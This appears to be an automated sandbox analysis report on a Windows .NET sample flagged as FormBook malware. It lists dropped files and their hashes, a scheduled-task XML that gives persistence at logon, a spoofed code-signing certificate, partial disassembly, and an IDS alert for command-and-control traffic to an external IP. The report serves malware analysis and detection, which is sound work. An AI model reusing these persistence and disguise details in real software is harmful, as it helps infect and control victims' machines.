                                                                                                  SHA-512:25917CB9C6632DB1F75C80CC6D64077EF742F6A6F2134DAB7D8DEFEB4DA10040A91B98A03560DDBF6A096E2ADC8CF496902E54877665B9E1C5542397C889E214
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\amd1qawb.4es.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\jkhdv24w.zfs.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:Unknown
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\nfqy1dns.11s.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\nlw0ae4g.0aj.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\snv2upmf.srm.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:Unknown
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\spbxmlzn.23j.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\sqlite3.def

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\findstr.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4993
                                                                                                  Entropy (8bit):4.3475762221054035
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:GcuN4gR+7Oc0XRMcCM3KVGOF9+BlMtvrmNHY0ac:E4Q+7Oc0JKVBF9+EvrmNHcc
                                                                                                  MD5:236236B6B95270B56C22F72FA7DFEC5C
                                                                                                  SHA1:DD00CA5516404703005D42C33524BC6778BE8419
                                                                                                  SHA-256:C5EDF6AFD22DD7FD0EFA2996716F25CD739731CAEA328532A8FD6EC64600E630
                                                                                                  SHA-512:084664F51A3E521155F1ACF6F35F7EDEEF74656536841B90F67FD2926F9815AD9D571D06E9EF19FBD2EF7050D99FDCF2E6BCD8974BFC340D004A141AA84646AF
                                                                                                  Malicious:false
                                                                                                  Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_column_decltype.sqlite3_co

                                                                                                  C:\Users\user\AppData\Local\Temp\sqlite3.dll

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\findstr.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):848173
                                                                                                  Entropy (8bit):6.502216720347079
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:VQTDOecqrIiIUmA+fciEXThQEGMT7G4Cq0Nwe:VyNcmIUmnf3EXThQEGDNF
                                                                                                  MD5:D5EA9B5814553BD2F9BBB8BF0EA94ED6
                                                                                                  SHA1:29629836C088DCD968EFB321832EDCBCFAAC5B51
                                                                                                  SHA-256:5EA67D6B7F67301CA214AF511740F26B9E6CC9E16B2C0EC7BBA071D05B9BDE78
                                                                                                  SHA-512:6867452995C8354622FE22CE4FB4868D2B9CB28BB31AA60B42F06E494B952F66C427AA66C7AF09240954BF55EBCDE62D4C7FEB9D99E742EA3BC5BEB3756A7A1E
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsx, Detection: malicious, Browse
                                                                                                  • Filename: tEBdYCAxQC.rtf, Detection: malicious, Browse
                                                                                                  • Filename: product Inquiry and RFQ ART LTD.doc, Detection: malicious, Browse
                                                                                                  • Filename: PAYROLL.doc, Detection: malicious, Browse
                                                                                                  • Filename: PAYROLL.doc, Detection: malicious, Browse
                                                                                                  • Filename: SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtf, Detection: malicious, Browse
                                                                                                  • Filename: d0#U10dc.xls, Detection: malicious, Browse
                                                                                                  • Filename: PO_JP233001_708.xls, Detection: malicious, Browse
                                                                                                  • Filename: Shipping Documents PL CI.doc, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%..X....[......!...............................a.......................................... .........................]............0.......................@..`0........................... .......................................................text...X...........................`.P`.data...|...........................@.`..rdata..4...........................@.`@.bss..................................`..edata..]...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc........0......................@.0..reloc..`0...@...2..................@.0B/4..................................@.@B/19................................@..B/31..........0......................@..B/45..........P......................@..B/57..........p......................@.0B/70.....i...............

                                                                                                  C:\Users\user\AppData\Local\Temp\tmp1A06.tmp

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe
                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1580
                                                                                                  Entropy (8bit):5.115141165473888
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuT3v
                                                                                                  MD5:E8CC20BCBC9EAB57AAA4A69584B4E6E4
                                                                                                  SHA1:E1371B69E09A2A59BBECF8AA1932707535913BD8
                                                                                                  SHA-256:887969E30667C42E3012326BA25DBBD49ABAB8DCA659C799B5AE0B8A06E91541
                                                                                                  SHA-512:A7FB0D28F097C46C30E9F6EB05F7B33A95BB1AC32CA27E6D68F2B9C5E2F6F0BF9B84A99E414876ABBC1494F753E5070F6E706D368463134837A239B44F82B322
                                                                                                  Malicious:false
                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                  C:\Users\user\AppData\Local\Temp\tmp47BA.tmp

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\ekte.exe
                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                  Category:modified
                                                                                                  Size (bytes):1580
                                                                                                  Entropy (8bit):5.115141165473888
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuT3v
                                                                                                  MD5:E8CC20BCBC9EAB57AAA4A69584B4E6E4
                                                                                                  SHA1:E1371B69E09A2A59BBECF8AA1932707535913BD8
                                                                                                  SHA-256:887969E30667C42E3012326BA25DBBD49ABAB8DCA659C799B5AE0B8A06E91541
                                                                                                  SHA-512:A7FB0D28F097C46C30E9F6EB05F7B33A95BB1AC32CA27E6D68F2B9C5E2F6F0BF9B84A99E414876ABBC1494F753E5070F6E706D368463134837A239B44F82B322
                                                                                                  Malicious:true
                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                  C:\Users\user\AppData\Local\Temp\ximjg3qh.2ny.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\zjplj4.zip

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\findstr.exe
                                                                                                  File Type:HTML document, ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):190
                                                                                                  Entropy (8bit):4.928010242697307
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:qVZxgROAyR0e0qHXbvx9McfwF0GFS77uR2MBJJULZIlV/4FXFAIuJFXhXWNqD:qzxUeR0eRHXLxytcu1Hlld4zGbeqD
                                                                                                  MD5:29B64AEEF6FFA765F807772C5A37EF26
                                                                                                  SHA1:84C4A3C9C719FB8E08CB98EB723393594BE47A3E
                                                                                                  SHA-256:FDBB57C3A2BE53BF761A2B87335B131A6329A8B0E4011B91EFD06F42E54385C8
                                                                                                  SHA-512:0EB587E98C18221CE44252724355B8031B1FEFBCADE32C6ECF2AED2C1AD658FE24DC2745F0F33303551228C29923CCCF76C141FACA1C015C7413E7537B576BC4
                                                                                                  Malicious:false
                                                                                                  Preview:<html><head><title lineno="380">Not Found</title></head>.<body><h1>Document Not Found</h1>.The document /2021/sqlite-dll-win32-x86-3340000.zip is not available on this server.</body></html>.

                                                                                                  C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\ekte.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):738312
                                                                                                  Entropy (8bit):7.825038116938872
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:K3GR4py73c1x80GypJsz9exfpoEs3pgd+jH4QxZqtQQikR:bReyz6OzlEGgd+jH4Qby
                                                                                                  MD5:A0F5D21AB28654F9310E591044950160
                                                                                                  SHA1:2DA8C07B8F8E3B1FF29CB2F7DB8419642C0A42E5
                                                                                                  SHA-256:C74E38C2E961CBBC34E20669E3DEB4B31BEEBC94824B096C88D8AAD8B75C4DCF
                                                                                                  SHA-512:8DA1931FFFB1D3145BC017B89DA318EAC9640882D64E3A62EE924B019B82657B2A202DF400517F762A14A198293448DFF8DA313964F327D6791DBCAFF92825AF
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 63%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..../.g..............0.................. ... ....@.. .......................`............@.................................l...O.... ..(................6...@....................................................... ............... ..H............text........ ...................... ..`.rsrc...(.... ......................@..@.reloc.......@......................@..B........................H.......Hu...`......(...D...(:............................................{....*..{....*V.( .....}......}....*...0..C........u........6.,0(!....{.....{....o"...,.(#....{.....{....o$...+..+..*. .[\. )UU.Z(!....{....o%...X )UU.Z(#....{....o&...X*.0..b........r...p......%..{.......%q.........-.&.+.......o'....%..{.......%q.........-.&.+.......o'....((...*..{)...*..{*...*V.( .....}).....}*...*.0..C........u........6.,0(!....{)....{)...o"...,.(#....{*....{*...o$...+..+..*. (.=. )U

                                                                                                  C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe:Zone.Identifier

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\ekte.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):26
                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                  Malicious:true
                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):7.825038116938872
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:ekte.exe
                                                                                                  File size:738'312 bytes
                                                                                                  MD5:a0f5d21ab28654f9310e591044950160
                                                                                                  SHA1:2da8c07b8f8e3b1ff29cb2f7db8419642c0a42e5
                                                                                                  SHA256:c74e38c2e961cbbc34e20669e3deb4b31beebc94824b096c88d8aad8b75c4dcf
                                                                                                  SHA512:8da1931fffb1d3145bc017b89da318eac9640882d64e3a62ee924b019b82657b2a202df400517f762a14a198293448dff8da313964f327d6791dbcaff92825af
                                                                                                  SSDEEP:12288:K3GR4py73c1x80GypJsz9exfpoEs3pgd+jH4QxZqtQQikR:bReyz6OzlEGgd+jH4Qby
                                                                                                  TLSH:14F412E2435AE722D6A98BF50271D67287719E4FA131D3438EDB9CEB3C507842C486DB
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..../.g..............0.................. ... ....@.. .......................`............@................................

                                                                                                  File Icon

                                                                                                  Icon Hash:d0d2c86bb8c4c4b9

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x4b10be
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:true
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x670F2FC0 [Wed Oct 16 03:15:12 2024 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                  Authenticode Signature

                                                                                                  Signature Valid:false
                                                                                                  Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                  Error Number:-2146869232
                                                                                                  Not Before, Not After
                                                                                                  • 11/12/2018 7:00:00 PM 11/8/2021 6:59:59 PM
                                                                                                  Subject Chain
                                                                                                  • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                  Version:3
                                                                                                  Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                  Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                  Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                  Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  jmp dword ptr [00402000h]
                                                                                                  inc ebx
                                                                                                  add byte ptr [edx+00h], dh
                                                                                                  jne 00007FC2295ACB62h
                                                                                                  add byte ptr fs:[ecx+00h], al
                                                                                                  jo 00007FC2295ACB62h
                                                                                                  jo 00007FC2295ACB62h
                                                                                                  insb
                                                                                                  add byte ptr [ecx+00h], ch
                                                                                                  arpl word ptr [eax], ax
                                                                                                  popad
                                                                                                  add byte ptr [eax+eax+69h], dh
                                                                                                  add byte ptr [edi+00h], ch
                                                                                                  outsb
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb106c0x4f.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x1628.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xb0e000x3608
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x20000xaf0e40xaf2005e26abefe141dcbd9899575c17ebc5ccFalse0.9145783145967167data7.8327880515520985IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0xb20000x16280x180095c087510753e537e41f055f2014673dFalse0.7052408854166666data6.705727286348662IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0xb40000xc0x2009376e7647c1a63296d9fa09a1b4ae46dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_ICON0xb20c80x120cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.841991341991342
                                                                                                  RT_GROUP_ICON0xb32e40x14data1.05
                                                                                                  RT_VERSION0xb33080x31cdata0.4296482412060301

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  mscoree.dll_CorExeMain

                                                                                                  Network Behavior

                                                                                                  Suricata IDS Alerts

                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-10-21T13:15:20.479155+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.22491673.33.130.19080TCP
